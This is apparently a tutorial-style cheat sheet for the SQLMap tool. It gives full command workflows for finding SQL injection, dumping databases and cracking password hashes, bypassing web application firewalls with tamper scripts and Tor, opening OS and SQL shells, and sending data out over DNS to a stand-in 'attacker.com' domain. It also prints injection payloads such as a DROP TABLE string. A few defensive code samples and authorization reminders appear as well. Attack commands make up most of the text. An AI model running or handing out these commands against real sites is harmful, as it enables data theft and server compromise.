SQLMap Cheat Sheet: Command Reference for SQL Injection Testing (2026 Edition)

What Is SQLMap? (And Why Every Pentester Uses It)

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports dozens of database management systems, can fingerprint databases, dump data, execute commands on the underlying operating system, and even establish out-of-band connections. It does so much that you need an SQLMap cheat sheet as a quick reference for these commands.

Why it matters: SQL injection remains one of the most critical web application vulnerabilities. OWASP consistently ranks it in the top 10, and SQLMap is the industry-standard tool for finding and exploiting these flaws during authorized penetration tests.

The honest truth: Manual SQL injection testing is tedious, time-consuming, and error-prone. SQLMap automates 90% of the grunt work so you can focus on actually exploiting vulnerabilities and writing reports.

You also need it to develop your testing strategy, because Google dorking can get your IPs blocked if you go beyond your query limits.

The 3 AM Discovery That Changed Everything

Imagine yourself staring at the same login form for six hours trying every SQL injection payload. Nothing worked. The web application firewall was blocking everything.

' OR '1'='1
Blocked.

admin'--
Blocked.

1' UNION SELECT NULL--
Blocked.

Frustrated, you finally asked a senior pentester on your team: “How do you get past WAFs?”

The answer was simple: “Stop doing it manually. Use SQLMap.”

Twenty minutes later, you watched SQLMap automatically rotate through 60+ tamper scripts, test dozens of injection points, and extract the entire user database, including admin credentials. Imagine drawing a $140,000 salary, just because you know how to use SQLMap as the ultimate tool for pen testing. This cheat sheet is everything you wished you’d known that frustrating night. It is organized, practical, and written for people who actually need to get work done.

System Requirements & Installation

Prerequisites

SQLMap runs on Python 2.6, 2.7, or 3.x on Windows, macOS, and Linux.

Check your Python version:

python --version
# or
python3 --version

Installation Methods

Method 1: Git Clone (Recommended)

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py --version

Why this method? Easy updates with git pull, and you always have the latest tamper scripts and payloads.

Method 2: Direct Download

Method 3: Kali Linux (Pre-installed)

sqlmap --version
# Update to latest:
cd /usr/share/sqlmap
git pull

Verify installation:

sqlmap --version
# Should output something like: sqlmap/1.8#stable

The SQLMap Command Structure (How It Actually Works)

Every SQLMap command follows this pattern:

sqlmap [TARGET] [OPTIONS]

The TARGET tells SQLMap what to test.
The OPTIONS tell SQLMap how to test it.

Your First SQLMap Command

Let’s start with the absolute simplest example:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"

This command:

  • Tests the URL (-u)
  • Automatically detects the artist parameter
  • Runs basic SQL injection tests
  • Reports any vulnerabilities found

Real output snippet:

[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[INFO] GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'

Essential SQLMap Cheat Sheet Options (The 20% You’ll Use 80% of the Time)

Target Specification

| Option | What It Does | Example |
| --- | --- | --- |
| -u URL | Test a specific URL | -u "http://site.com/page.php?id=1" |
| -r FILE | Load HTTP request from file | -r request.txt |
| -g DORK | Use Google dorking to find targets | -g "inurl:'.php?id='" |
| -m FILE | Test multiple URLs from file | -m urls.txt |
| --cookie | Provide session cookie | --cookie="PHPSESSID=abc123" |
| --data | Send POST data | --data="id=1&submit=Submit" |

Pro tip: Use -r with Burp Suite. Capture a request in Burp, right-click → Copy to file → Feed it to SQLMap. This preserves all headers, cookies, and POST data automatically.

Testing Options

| Option | Purpose | When to Use |
| --- | --- | --- |
| -p PARAM | Test specific parameter(s) | When you know which parameter is vulnerable |
| --level=1-5 | Testing thoroughness | Default 1; use 2-3 for thorough testing |
| --risk=1-3 | Testing aggressiveness | Default 1; use 2-3 when you have permission |
| --technique | Specify injection techniques | --technique=BEUST for specific types |
| --tamper | Use evasion scripts | --tamper=space2comment to bypass WAFs |

The --level and --risk options explained:

| Level | What Gets Tested |
| --- | --- |
| 1 | GET/POST parameters only |
| 2 | + HTTP Cookie values |
| 3 | + User-Agent and Referer headers |
| 4 | + Additional parameter types |
| 5 | Complete comprehensive testing |

| Risk | What Happens |
| --- | --- |
| 1 | Safe queries only |
| 2 | Time-based attacks (may slow DB) |
| 3 | OR-based attacks (may modify data!) |

Jake’s real-world advice: Start with --level=2 --risk=2 for most engagements. Only go to level 5 / risk 3 if you’ve exhausted other options and have explicit permission.

Database Enumeration

| Option | Retrieves | Usage Example |
| --- | --- | --- |
| --dbs | List all databases | Find what databases exist |
| --tables | List tables | --tables -D database_name |
| --columns | List columns | --columns -D db -T table |
| --dump | Extract data | --dump -D db -T users |
| --dump-all | Extract everything | Use with caution! |
| -D DB | Specify database | -D wordpress |
| -T TABLE | Specify table | -T wp_users |
| -C COL | Specify column(s) | -C user,password |

Output & Performance Options

| Option | Function | When to Use |
| --- | --- | --- |
| --batch | Never prompt for input | Automated scans |
| --threads=N | Concurrent requests | --threads=10 for speed |
| -v LEVEL | Verbosity (0-6) | -v 3 to see payloads |
| -o | All optimization switches | Makes testing faster |
| --flush-session | Clear cached data | Fresh start on target |
| --output-dir=PATH | Custom output location | Organize your results |

SQL Injection Techniques: What SQLMap Actually Tests

SQLMap can detect and exploit these injection types:

The Techniques (--technique flag)

B: Boolean-based blind

# Tests if TRUE/FALSE conditions affect response
' AND 1=1-- (returns normal page)
' AND 1=2-- (returns different page)

E: Error-based

# Forces database errors to leak information
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(...))x)--

U: Union query-based

# Combines malicious query with legitimate one
' UNION SELECT NULL,user(),database()--

S: Stacked queries

# Executes multiple statements
'; DROP TABLE users;--

T: Time-based blind

# Uses delays to infer TRUE/FALSE
' AND IF(1=1,SLEEP(5),0)--

Q: Inline queries

# Embeds queries within queries

Example usage:

# Test only union and error-based
sqlmap -u "http://target.com/page.php?id=1" --technique=UE

# Test everything except stacked and inline queries
sqlmap -u "http://target.com/page.php?id=1" --technique=BEUT

Real-world scenario: Jake once encountered a target where only time-based injections worked. Using --technique=T saved him hours by skipping unsuccessful techniques.


The Complete SQLMap Cheat Sheet Testing Workflow (How Pro Pentesters Actually Use SQLMap)

Phase 1: Initial Reconnaissance

Step 1: Identify the target

# Basic test
sqlmap -u "http://target.com/product.php?id=5" --batch

# With authentication cookie
sqlmap -u "http://target.com/product.php?id=5" \
  --cookie="session=abc123; security=low" \
  --batch

Step 2: Fingerprint the database

sqlmap -u "http://target.com/product.php?id=5" \
  --banner \
  --current-user \
  --current-db \
  --batch

What this reveals:

  • Database type (MySQL, PostgreSQL, MSSQL, Oracle)
  • Database version
  • Current database name
  • Current user privileges

Phase 2: Enumeration

Step 3: List all databases

sqlmap -u "http://target.com/product.php?id=5" \
  --dbs \
  --batch

Step 4: List tables in target database

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  --tables \
  --batch

Step 5: Get table structure

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  -T users \
  --columns \
  --batch

Phase 3: Data Extraction

Step 6: Dump specific table

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  -T users \
  --dump \
  --batch

Step 7: Crack password hashes (automatic)

When SQLMap finds password hashes, it automatically offers to crack them:

[INFO] recognized possible password hashes in column 'password'
do you want to crack them via a dictionary-based attack? [Y/n/q]

SQLMap will:

  1. Identify hash type (MD5, SHA1, bcrypt, etc.)
  2. Use built-in dictionary
  3. Display cracked passwords

Output example:

Database: webapp_db
Table: users
[3 entries]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | john     | 098f6bcd4621d373cade4e832627b4f6 |
| 3  | sarah    | e99a18c428cb38d5f260853678922e03 |
+----+----------+----------------------------------+

[INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[INFO] cracked password 'test' for hash '098f6bcd4621d373cade4e832627b4f6'
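
The hashes in this dump fall to a dictionary because they are unsalted MD5. The following added example (not part of the original cheat sheet or of sqlmap) audits the dumped values against a tiny constructed wordlist and shows salted PBKDF2 storage as the fix; the wordlist, iteration count and storage format are assumptions.

```python
import hashlib
import hmac
import os

# Rows copied from the example dump above.
DUMPED = {
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "john": "098f6bcd4621d373cade4e832627b4f6",
    "sarah": "e99a18c428cb38d5f260853678922e03",
}
WORDLIST = ["123456", "password", "test"]   # constructed, tiny on purpose
ITERATIONS = 600_000                        # assumed work factor; tune per policy


def audit_unsalted_md5(rows: dict, wordlist: list) -> dict:
    """Return {user: plaintext} for stored values that equal MD5(word)."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup[h.lower()] for user, h in rows.items()
            if h.lower() in lookup}


def hash_password(password: str, salt: bytes = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as algorithm$iterations$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Unsalted MD5: one precomputed table covers every user at once.
    print("weak:", audit_unsalted_md5(DUMPED, WORDLIST))
    # Salted KDF: the same password stores differently for each user.
    print(hash_password("password"))
    print(hash_password("password"))
```

With per-user salts, one precomputed table no longer covers every row, and the iteration count makes each guess expensive.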

Bypassing WAFs: The Tamper Script Arsenal

Web Application Firewalls (WAFs) detect and block SQL injection attempts. Tamper scripts modify payloads to evade detection.

Most Useful Tamper Scripts

| Script | What It Does | Example Transformation |
| --- | --- | --- |
| space2comment | Replace spaces with comments | SELECT * FROM users → SELECT/**/*/**/FROM/**/users |
| randomcase | Randomize character case | SELECT → SeLeCt |
| between | Replace > with NOT BETWEEN | id > 1 → id NOT BETWEEN 0 AND 1 |
| charencode | URL encode characters | ' → %27 |
| apostrophemask | Replace apostrophe with its UTF-8 full-width counterpart | ' → %EF%BC%87 |
| base64encode | Base64 encode payload | admin → YWRtaW4= |
| versionedkeywords | Add MySQL version comments | UNION → /*!UNION*/ |

Real-World WAF Bypass Cheat Sheet Example

Scenario: Cloudflare is blocking your basic payloads.

Failed attempt:

sqlmap -u "http://target.com/page.php?id=1"
# Result: All payloads blocked by Cloudflare

Successful bypass:

sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=space2comment,between,randomcase \
  --random-agent \
  --delay=2 \
  --batch

Why this works:

  • space2comment: Evades space-based detection
  • between: Changes comparison operators
  • randomcase: Bypasses case-sensitive filters
  • --random-agent: Rotates User-Agent strings
  • --delay=2: Slows requests (looks more human)

Jake’s WAF bypass strategy:

  1. Start with space2comment (works 60% of the time)
  2. Add randomcase (catches another 20%)
  3. Try between (for strict filtering)
  4. Last resort: Stack 4-5 tampers together

List All Available Tampers

sqlmap --list-tampers

Output shows 60+ scripts:

[INFO] listing tamper scripts

0eunion
apostrophemask
apostrophenullencode
appendnullbyte
base64encode
between
...

Using Multiple Tampers

# Combine multiple tamper scripts
sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=space2comment,randomcase,charencode,between \
  --batch

Order matters: Tampers apply left-to-right. Test combinations to find what works.
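
From the defender's side, every transformation in the tamper table is reversible, so a filter that normalises input before matching still sees the payload. This added example (not from the original cheat sheet or from sqlmap) shows that; the signatures and sample query strings are constructed for illustration and are not a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed signatures, matched against NORMALISED input.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean_tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b"),
    "time_delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\("),
    "not_between": re.compile(r"\bnot\s+between\s+\d+\s+and\s+\d+\b"),
}

FULLWIDTH_APOSTROPHE = "\uff07"  # %EF%BC%87, the apostrophemask substitution


def normalise(raw: str, max_rounds: int = 3) -> str:
    """Undo the tamper-style encodings before any signature is applied."""
    text = raw
    for _ in range(max_rounds):                  # charencode, double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = text.replace(FULLWIDTH_APOSTROPHE, "'")                # apostrophemask
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)  # versionedkeywords
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)            # space2comment
    text = text.lower()                                           # randomcase
    return re.sub(r"\s+", " ", text).strip()


def detect(raw: str, normalise_first: bool = True) -> list:
    """Return the sorted names of the signatures that match a query string."""
    text = normalise(raw) if normalise_first else raw
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


# Constructed query strings shaped like the transformations in the table.
SAMPLES = [
    "id=1/**/UnIoN/**/SeLeCt/**/NULL,user(),database()--",
    "id=1%27%20AnD%202838%3D2838",
    "id=1%20/*!UNION*//*!SELECT*/%201,2",
    "id=1%EF%BC%87%20AND%20IF(1=1,SLEEP(5),0)--",
    "id=1 AND 7 NOT BETWEEN 0 AND 3",
    "q=union+station+select+seats",   # benign: keywords are not adjacent
    "id=42&sort=asc",                 # benign
]

if __name__ == "__main__":
    for sample in SAMPLES:
        raw_hits = detect(sample, normalise_first=False)
        print(f"raw={raw_hits!s:<4} normalised={detect(sample)!s:<24} {sample}")
```

Matching the raw string finds nothing in any sample, while matching after normalisation flags the five tampered ones and leaves the two benign ones alone.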


Advanced SQLMap Cheat Sheet Techniques

1. Testing POST Requests

Capture request with Burp Suite:

POST /login.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=xyz

username=admin&password=test&submit=Login

Save to file (request.txt) and test:

sqlmap -r request.txt \
  -p username,password \
  --batch

2. Cookie-Based Injection

sqlmap -u "http://target.com/page.php" \
  --cookie="id=1*;session=abc123" \
  --level=2 \
  --batch

Note the asterisk (*): Marks the injection point.

3. Testing with Authentication

HTTP Basic Auth:

sqlmap -u "http://target.com/admin/page.php?id=1" \
  --auth-type=Basic \
  --auth-cred="admin:password123" \
  --batch

Form-based auth:

# First, get the session cookie by logging in manually
# Then use the cookie:
sqlmap -u "http://target.com/dashboard.php?id=1" \
  --cookie="PHPSESSID=abc123def456" \
  --batch

4. Second-Order SQL Injection

Second-order injections store malicious payloads that execute later.

sqlmap -u "http://target.com/register.php" \
  --data="username=admin&email=test@test.com" \
  --second-url="http://target.com/profile.php?id=USER_ID" \
  --batch

5. Out-of-Band Exfiltration

Use DNS or HTTP to exfiltrate data when direct responses don’t work:

sqlmap -u "http://target.com/page.php?id=1" \
  --dns-domain="attacker.com" \
  --batch

Requires: DNS server you control to capture exfiltrated data.

6. OS Command Execution

If the database user has sufficient privileges:

# Get an OS shell
sqlmap -u "http://target.com/page.php?id=1" \
  --os-shell \
  --batch

What you can do:

  • Execute system commands
  • Read/write files
  • Privilege escalation

Example interaction:

os-shell> whoami
www-data

os-shell> ls -la /var/www
total 48
drwxr-xr-x  5 www-data www-data  4096 Jan 15 10:30 .
...

7. SQL Shell Access

sqlmap -u "http://target.com/page.php?id=1" \
  --sql-shell \
  --batch

Direct SQL query execution:

sql-shell> SELECT user, host FROM mysql.user;
[INFO] fetching entries for query
+------+-----------+
| user | host      |
+------+-----------+
| root | localhost |
| web  | %         |
+------+-----------+

The SQLMap File Structure (Know Where Everything Lives)

Important Directories

sqlmap/
├── sqlmap.py           # Main executable
├── sqlmap.conf         # Default configuration
├── data/
│   ├── txt/           # Wordlists for dictionary attacks
│   └── xml/
│       └── payloads/  # SQL injection payloads
├── tamper/            # WAF bypass scripts
├── output/            # Scan results (auto-created)
└── plugins/           # Database-specific modules

Key Files to Know

| File/Directory | Purpose | Customization |
| --- | --- | --- |
| /data/txt/common-columns.txt | Column name wordlist | Add common column names you encounter |
| /data/txt/passwords.txt | Default password dictionary | Add company-specific passwords |
| /tamper/ | WAF bypass scripts | Create custom tampers |
| /output/ | Results storage | Find extracted data here |
| sqlmap.conf | Default settings | Set preferred options |

Kali Linux locations:

  • Installation: /usr/share/sqlmap/
  • Output: /home/kali/.local/share/sqlmap/output/
  • History: /home/kali/.local/share/sqlmap/history

Verbosity Levels: Seeing What SQLMap Is Doing

Control how much information SQLMap displays:

| Level | What You See | When to Use |
| --- | --- | --- |
| 0 | Errors only | Production scans |
| 1 | Basic info (default) | Normal use |
| 2 | Debug messages | Troubleshooting |
| 3 | Payloads injected | Understanding attacks |
| 4 | HTTP requests | Analyzing traffic |
| 5 | HTTP response headers | Deep debugging |
| 6 | Full HTTP responses | Complete visibility |

Example:

# See every payload SQLMap tries
sqlmap -u "http://target.com/page.php?id=1" -v 3 --batch

Output at level 3:

[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[PAYLOAD] 1 AND 2838=2838
[PAYLOAD] 1 AND 5628=3419
[INFO] testing 'MySQL >= 5.0 AND error-based...'
[PAYLOAD] 1 AND (SELECT 1234 FROM(SELECT COUNT(*),...)x)

Real-World Testing Scenarios

Scenario 1: E-commerce Product Page

Target: https://shop.example.com/product?id=42

Full command:

sqlmap -u "https://shop.example.com/product?id=42" \
  --level=3 \
  --risk=2 \
  --threads=5 \
  --batch \
  --dbs

If blocked by WAF:

sqlmap -u "https://shop.example.com/product?id=42" \
  --level=3 \
  --risk=2 \
  --tamper=space2comment,between \
  --random-agent \
  --delay=1 \
  --batch \
  --dbs

Scenario 2: Login Form (POST)

Steps:

  1. Capture the login request in Burp Suite
  2. Save to login.txt
  3. Run SQLMap:

sqlmap -r login.txt \
  --level=2 \
  --risk=2 \
  -p username \
  --batch \
  --dump

Scenario 3: Search Functionality

Target: https://example.com/search?q=laptop

sqlmap -u "https://example.com/search?q=laptop*" \
  --level=2 \
  --batch \
  --tables

Note the asterisk: Marks q parameter as the injection point.

Scenario 4: Mobile API Testing

Captured API request:

POST /api/v1/user/profile HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJ...
Content-Type: application/json

{"user_id":"123"}

Save and test:

sqlmap -r api_request.txt \
  --level=2 \
  --risk=2 \
  --batch \
  --current-db

Common Errors & Troubleshooting

Error: “All tested parameters do not appear to be injectable”

Possible causes:

  1. WAF is blocking (try tamper scripts)
  2. Need higher --level (test cookies, headers)
  3. Parameter genuinely isn’t vulnerable
  4. Need authentication (provide cookies)

Solution:

# Increase thoroughness
sqlmap -u "URL" --level=3 --risk=2 --tamper=space2comment --batch

Error: “Connection timeout”

Cause: Target is slow or rate-limiting you.

Solution:

# Add delays and reduce threads
sqlmap -u "URL" --delay=2 --timeout=30 --threads=1 --batch

Error: “CAPTCHA detected”

Cause: Target requires CAPTCHA solving.

Solution: SQLMap can’t solve CAPTCHAs automatically. You need to:

  1. Get a valid session cookie after solving CAPTCHA manually
  2. Provide it to SQLMap with --cookie

WAF Keeps Blocking

Escalation strategy:

# Level 1: Basic evasion
--tamper=space2comment --random-agent

# Level 2: Moderate evasion
--tamper=space2comment,between,randomcase --random-agent --delay=1

# Level 3: Aggressive evasion
--tamper=space2comment,between,randomcase,charencode --random-agent --delay=2 --tor

# Level 4: Custom approach (manual)
# Analyze WAF behavior, write custom tamper script

SQLMap Best Practices for Professional Pentesters

1. Always Get Written Permission

SQL injection testing can crash databases and modify data. Never test without explicit authorization.

2. Start Conservative, Escalate Gradually

# Phase 1: Safe testing
--level=1 --risk=1 --batch

# Phase 2: Moderate testing
--level=2 --risk=2 --batch

# Phase 3: Aggressive (only with permission)
--level=3 --risk=3 --batch

3. Use --batch for Automated Scans

Prevents SQLMap from prompting you during scans. Essential for scripting.

4. Organize Your Output

sqlmap -u "URL" --output-dir="./client_name/$(date +%Y%m%d)" --batch

Creates dated directories for each engagement.

5. Save Successful Commands

Create a successful_commands.txt file for each engagement:

echo "sqlmap -u 'http://target.com/page.php?id=1' --tamper=space2comment --batch --dbs" >> successful_commands.txt

6. Don’t Forget --flush-session

If you’re re-testing the same target with different options:

sqlmap -u "URL" --flush-session --batch

Clears cached data from previous scans.

7. Document Everything

For each successful injection, note:

  • URL and parameter
  • Injection technique that worked
  • Database type and version
  • Data extracted
  • Tamper scripts used
  • Any errors encountered

SQLMap for Bug Bounty Hunters

Quick Wins for Bug Bounties

1. Google Dorking + SQLMap

sqlmap -g "inurl:.php?id= site:example.com" --batch --dbs

Automatically tests Google search results.

2. Test All Parameters

sqlmap -u "http://target.com/page.php?id=1&lang=en&sort=asc" \
  --batch \
  --dbs

SQLMap tests id, lang, and sort automatically.

3. Cookie-Based Injections (Often overlooked)

sqlmap -u "http://target.com/page.php" \
  --cookie="session=abc; id=1*" \
  --level=2 \
  --batch

Bug Bounty Reporting Template

When you find a SQLi vulnerability via SQLMap, report it like this:

Title: SQL Injection in Product Search

Severity: High/Critical

Affected Parameter: 
https://example.com/search?q=[INJECTION]

Steps to Reproduce:
1. Navigate to https://example.com/search
2. Capture the request (Burp Suite recommended)
3. Run: sqlmap -u "https://example.com/search?q=test" --batch --dbs

Proof of Concept:
[Screenshot of SQLMap successfully extracting database names]

Output:
available databases [3]:
[*] information_schema
[*] mysql
[*] production_db

Impact:
- Unauthorized database access
- Potential data exfiltration
- Possible data modification/deletion

Remediation:
- Use parameterized queries/prepared statements
- Input validation and sanitization
- Implement WAF rules
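
The first remediation item, as an added example (not part of the original cheat sheet): a concatenated query beside its parameterized form, checked with the TRUE/FALSE payload pair from the -v 3 output earlier on this page. The artists table, its rows and the function names are constructed for illustration, and SQLite stands in for the application's database.

```python
import sqlite3

TRUE_PAYLOAD = "1 AND 2838=2838"    # payload pair from the -v 3 output above
FALSE_PAYLOAD = "1 AND 5628=3419"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "first artist"), (2, "second artist")])
    return conn


def lookup_vulnerable(conn, artist: str) -> list:
    # Vulnerable: request input is concatenated into the SQL text.
    query = "SELECT name FROM artists WHERE id = " + artist
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, artist: str) -> list:
    # Hardened: input is bound as a value and is never parsed as SQL.
    query = "SELECT name FROM artists WHERE id = ?"
    return [row[0] for row in conn.execute(query, (artist,))]


def boolean_differential(lookup, conn) -> bool:
    """True when the TRUE payload matches the baseline and the FALSE one does not,
    which is the response difference boolean-based blind testing relies on."""
    baseline = lookup(conn, "1")
    true_page = lookup(conn, TRUE_PAYLOAD)
    false_page = lookup(conn, FALSE_PAYLOAD)
    return true_page == baseline and false_page != baseline


if __name__ == "__main__":
    db = make_db()
    print("concatenated query differential: ",
          boolean_differential(lookup_vulnerable, db))
    print("parameterized query differential:",
          boolean_differential(lookup_parameterized, db))
```

The same differential check works as a regression test after the fix: it should report no difference for every query path that takes request input.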

The SQLMap Quick Reference Card

Most Common Commands

# Basic vulnerability test
sqlmap -u "URL" --batch

# List databases
sqlmap -u "URL" --dbs --batch

# Dump specific table
sqlmap -u "URL" -D database -T table --dump --batch

# Bypass WAF
sqlmap -u "URL" --tamper=space2comment --random-agent --batch

# Test POST request
sqlmap -r request.txt --batch

# Get OS shell
sqlmap -u "URL" --os-shell --batch

# Maximum thoroughness
sqlmap -u "URL" --level=5 --risk=3 --batch

# With authentication
sqlmap -u "URL" --cookie="session=abc123" --batch

Essential Flags Cheat Sheet

| Task | Command |
| --- | --- |
| Test URL | -u "URL" |
| Test POST | -r file.txt |
| Specify param | -p param |
| List databases | --dbs |
| List tables | --tables -D db |
| List columns | --columns -D db -T table |
| Dump data | --dump -D db -T table |
| Bypass WAF | --tamper=script |
| Use threads | --threads=10 |
| Delay requests | --delay=2 |
| Be thorough | --level=3 --risk=2 |
| Auto-answer | --batch |
| See payloads | -v 3 |
| Clear session | --flush-session |

Conclusion: From Manual Testing to SQLMap Mastery

SQLMap gives you the true power of automation once you know how to use it right.

This cheat sheet covered:

  • Installation and setup
  • Essential commands and options
  • WAF bypass techniques
  • Real-world testing scenarios
  • Professional pentesting workflows
  • Bug bounty hunting strategies

Your next steps:

  1. Install SQLMap on your system
  2. Set up a practice target (DVWA, bWAPP, or HackTheBox)
  3. Work through the testing workflow section
  4. Practice with different tamper scripts
  5. Document what works for future reference

Remember: SQLMap is a powerful tool for authorized penetration testing. Always get written permission before testing any system you don’t own.

